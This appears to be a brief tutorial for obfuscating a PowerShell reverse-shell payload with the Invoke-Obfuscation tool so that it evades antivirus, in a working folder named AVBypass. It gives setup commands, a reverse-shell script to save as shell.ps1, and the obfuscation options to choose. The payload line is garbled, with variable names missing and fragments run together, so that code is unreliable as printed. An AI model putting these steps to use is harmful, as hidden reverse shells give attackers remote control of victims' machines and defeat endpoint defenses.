sudo apt install powershell
Then download the Invoke-Obfuscation module
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
go to the folder and start powershell: pwsh
Then import this module:
Invoke-Obfuscation
Then we need a powershell payload to obfuscate and save it as shell.ps1:
stream = bytes = 0..65535|%{0};while(($i = bytes, 0, data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, sendback = (iex sendback2 = sendbyte = ASCII).GetBytes(stream.Write(sendbyte.Length);client.Close(
Then use this command with the path for the script:
SET SCRIPTPATH /home/asem/AVBypass/shell.ps1
One of the options is to use: AST then ALL then u will see the Obfuscated script